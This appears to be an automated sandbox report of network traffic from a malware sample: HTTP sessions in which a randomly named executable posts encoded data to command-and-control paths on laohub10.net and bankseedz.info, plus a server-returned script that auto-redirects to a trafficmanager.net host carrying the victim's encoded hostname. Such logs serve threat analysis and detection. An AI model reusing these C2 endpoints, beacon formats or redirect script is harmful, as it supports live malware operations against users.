                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.105153723.225.159.42806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:22.090956926 CET771OUTPOST /n2c9/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.laohub10.net
                                                                                                              Origin: http://www.laohub10.net
                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 38 61 4a 47 55 77 78 49 4a 67 34 55 6a 45 51 79 48 62 31 69 62 33 45 56 6f 54 6c 48 38 6c 6f 52 6a 4c 41 61 6a 62 4a 31 35 38 4c 2b 30 54 4f 6e 74 2b 4f 4d 59 6c 6b 59 6f 73 6a 43 57 72 79 74 45 79 46 64 6e 68 34 7a 58 43 48 4b 4c 55 73 59 68 4e 48 31 75 71 6f 79 48 6b 78 71 66 68 2f 41 42 5a 4a 5a 58 4f 75 32 6c 36 5a 4e 48 2f 52 62 43 5a 33 50 31 6a 35 41 59 5a 6e 49 56 6d 71 6b 78 55 79 52 34 37 37 43 50 63 49 39 47 34 52 68 4d 64 38 46 6a 31 45 43 7a 55 6e 72 58 32 31 73 64 61 58 65 72 2f 67 77 3d 3d
                                                                                                              Data Ascii: 6n=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9G4RhMd8Fj1ECzUnrX21sdaXer/gw==
                                                                                                              Jan 11, 2025 03:25:22.614605904 CET533INHTTP/1.1 200 OK
                                                                                                              Server: Apache
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Accept-Ranges: bytes
                                                                                                              Cache-Control: max-age=86400
                                                                                                              Age: 1
                                                                                                              Connection: Close
                                                                                                              Content-Length: 358
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.105153823.225.159.42806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:24.641237974 CET1784OUTPOST /n2c9/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.laohub10.net
                                                                                                              Origin: http://www.laohub10.net
                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 6b 61 4a 31 63 77 7a 70 4a 67 35 55 6a 45 61 53 48 61 31 69 62 36 45 56 67 58 6c 48 78 48 6f 54 62 4c 43 38 33 62 4d 41 56 38 42 2b 30 54 43 48 74 2f 42 73 59 77 6b 59 5a 72 6a 43 47 72 79 74 45 79 46 59 72 68 38 69 58 43 46 4b 4c 54 38 49 68 42 44 31 75 4f 6f 79 66 4f 78 71 62 78 2f 7a 4a 5a 49 34 37 4f 6f 41 52 36 47 39 48 39 51 62 43 42 33 50 70 47 35 47 39 33 6e 4d 64 59 71 6e 68 55 79 58 51 67 38 68 47 45 56 2f 61 62 66 52 55 6d 35 44 6a 7a 49 67 2b 71 67 65 44 78 72 73 45 33 58 75 33 77 37 6a 31 62 50 78 41 70 4d 4a 36 4b 53 6b 42 56 53 4a 66 57 46 78 39 36 6d 49 6e 68 75 4f 43 70 66 66 51 32 70 5a 33 45 46 52 69 73 74 45 61 4b 6a 4e 48 66 2b 71 74 72 6c 79 4b 34 4a 73 52 35 4c 4d 70 72 37 6a 47 67 47 6a 53 2f 4f 70 79 55 52 56 58 79 66 6f 4d 39 48 6b 4e 70 68 54 37 2f 51 6a 51 44 6e 52 71 6c 54 7a 45 35 59 6e 74 56 6c 77 71 52 59 65 64 6f 59 46 68 39 41 49 73 [TRUNCATED]
                                                                                                              Data Ascii: 6n=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXUkaJ1cwzpJg5UjEaSHa1ib6EVgXlHxHoTbLC83bMAV8B+0TCHt/BsYwkYZrjCGrytEyFYrh8iXCFKLT8IhBD1uOoyfOxqbx/zJZI47OoAR6G9H9QbCB3PpG5G93nMdYqnhUyXQg8hGEV/abfRUm5DjzIg+qgeDxrsE3Xu3w7j1bPxApMJ6KSkBVSJfWFx96mInhuOCpffQ2pZ3EFRistEaKjNHf+qtrlyK4JsR5LMpr7jGgGjS/OpyURVXyfoM9HkNphT7/QjQDnRqlTzE5YntVlwqRYedoYFh9AIsV5hiLM6qanJwV2Y3+gW8OMm39ujWL5Z20gcs2vhqmVd+5lP7ap82AWWig8q/UcexVvZYiZ8u5nhnRdahTFM2r49mShulK3WLP5tRiE+fDcNKQusnJuSX2y3tmAxNTESWzZ1mMhWo4XFbKj0IAdyc45fKZCqy+rub9t9kURiVvHGTBj3zXUshEQFGCuNkZhY8sY6GLnEBeY8cTG0YVE2EncvEMgJHh8LlNKtlZ1+T8FnWmuSjmsw635V8ujGIeV6k2T/ZNyKP+cjIPwVsYPu4njTLy8DP3Ok2PpCba8FDh5I83lWuvw6KwpsLGSYFpBtWDdsmeww2/+2z4cNHr1A0VarGt0ocBLDhLgUqbLnR6WNsDEi/doMUtPwGm+/1zn0nhklpJj/GzAlyidF4V9Tfsuy0ol4Ci4ea6h8CNBHB4HztaNa9jWSC7AGZlo1WbFbsYcfsiWhqRCwyjBE2D40AQR15Y0Ov7coP8T1WhK/I2U52CPQ+qXCK/oYbHkznsZWR/muFtdy1X7uM+sf/PCBiHemsUprmXGUwaIhwbxqyC5K6iHHWEMklfaFO4c3RhUPXtO545AO56uhrQbuZY0+E4K2BomMvcLoStLlPokJ0JfK4FyOIO4I9Fq5AUKvIvoI152rTfJoa67h6wibx1iR7FCEzpH3QZo8Nga [TRUNCATED]
                                                                                                              Jan 11, 2025 03:25:25.147773981 CET533INHTTP/1.1 200 OK
                                                                                                              Server: Apache
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Accept-Ranges: bytes
                                                                                                              Cache-Control: max-age=86400
                                                                                                              Age: 1
                                                                                                              Connection: Close
                                                                                                              Content-Length: 358
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.105153923.225.159.42806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:27.201853037 CET487OUTGET /n2c9/?6n=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvFKcHVyRNQ0lpxItwqxseE7Zdzalg==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.laohub10.net
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:25:27.718453884 CET533INHTTP/1.1 200 OK
                                                                                                              Server: Apache
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Accept-Ranges: bytes
                                                                                                              Cache-Control: max-age=86400
                                                                                                              Age: 1
                                                                                                              Connection: Close
                                                                                                              Content-Length: 358
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.105154046.30.211.38806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:32.926224947 CET753OUTPOST /uf7y/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.bankseedz.info
                                                                                                              Origin: http://www.bankseedz.info
                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 6f 72 59 56 50 2b 49 38 54 31 4a 78 35 76 6f 44 78 6d 33 75 6e 6c 48 68 4e 6b 4c 36 6b 74 57 76 55 37 76 64 74 4a 4c 70 41 45 45 32 6d 45 48 58 50 77 67 66 41 6f 4b 62 6a 2b 4e 69 61 61 36 72 75 45 4d 66 31 4f 38 7a 36 59 70 4c 6e 65 53 58 4f 45 4a 43 47 51 45 2b 35 6d 67 44 39 51 66 42 58 35 7a 32 46 32 33 69 76 4f 31 4e 79 5a 67 68 64 6d 33 49 71 59 41 52 6d 6f 34 52 34 44 30 6d 4b 32 57 36 37 65 56 46 4a 4f 47 34 64 4b 76 79 5a 36 35 6f 71 47 4e 63 52 53 54 59 43 53 68 5a 6f 78 62 78 78 46 51 4c 35 44 55 63 49 62 30 5a
                                                                                                              Data Ascii: 6n=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65oqGNcRSTYCShZoxbxxFQL5DUcIb0Z
                                                                                                              Jan 11, 2025 03:25:33.524447918 CET738INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Sat, 11 Jan 2025 02:25:33 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 564
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.105154146.30.211.38806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:35.567595005 CET777OUTPOST /uf7y/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.bankseedz.info
                                                                                                              Origin: http://www.bankseedz.info
                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 62 6d 76 55 62 66 64 73 49 4c 70 4f 6b 45 32 31 45 48 57 58 51 67 41 41 6f 50 6d 6a 2b 78 69 61 61 75 72 75 42 6f 66 31 39 55 77 72 59 70 4a 76 2b 53 56 4b 45 4a 43 47 51 45 2b 35 6d 6c 4c 39 51 48 42 58 49 44 32 58 45 66 6a 7a 65 31 4f 7a 5a 67 68 5a 6d 32 67 71 59 41 2f 6d 70 6b 33 34 46 77 6d 4b 7a 53 36 37 72 70 4b 65 65 47 45 5a 4b 75 57 55 61 45 4b 6b 48 31 62 53 67 4f 59 64 6a 68 59 6d 77 6d 32 67 55 78 63 71 30 49 53 47 64 42 7a 4c 32 6c 37 77 46 6b 66 5a 62 45 42 69 35 2f 4c 55 37 61 2b 36 41 3d 3d
                                                                                                              Data Ascii: 6n=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0ISGdBzL2l7wFkfZbEBi5/LU7a+6A==
                                                                                                              Jan 11, 2025 03:25:36.119391918 CET738INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Sat, 11 Jan 2025 02:25:36 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 564
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.105154246.30.211.38806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:38.133070946 CET1790OUTPOST /uf7y/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.bankseedz.info
                                                                                                              Origin: http://www.bankseedz.info
                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 59 47 76 55 6f 6e 64 71 72 7a 70 4e 6b 45 32 32 45 48 54 58 51 67 4a 41 6f 32 74 6a 2b 38 41 61 5a 57 72 75 6e 30 66 6b 38 55 77 69 59 70 4a 6a 65 53 49 4f 45 4a 58 47 51 55 69 35 6c 4e 4c 39 51 48 42 58 4b 62 32 48 47 33 6a 78 65 31 4e 79 5a 67 6c 64 6d 32 62 71 59 59 4a 6d 70 78 4d 35 31 51 6d 4b 54 69 36 35 35 42 4b 64 2b 47 38 65 4b 75 4f 55 61 49 38 6b 48 70 68 53 68 37 46 64 6c 52 59 6e 55 33 48 33 52 51 48 33 79 51 75 59 74 39 54 49 57 6b 63 77 33 51 64 56 4f 64 56 30 5a 32 6c 65 34 7a 6e 6e 57 49 58 72 7a 55 35 4f 4d 57 59 47 6c 5a 71 38 2f 2f 4b 69 77 4c 4a 79 45 68 4e 33 74 6e 66 36 68 61 56 35 69 6f 4f 45 44 42 72 2f 51 46 61 46 75 6c 41 42 58 37 6e 4e 31 44 69 68 4d 4a 59 4a 2f 68 4d 38 53 74 75 31 6c 31 58 4d 39 41 66 62 37 78 48 56 71 4b 77 53 79 51 41 41 48 2b 55 47 46 47 56 77 47 6a 70 50 4c 4e 74 77 53 31 53 72 57 39 56 78 48 74 76 66 76 54 42 59 36 78 [TRUNCATED]
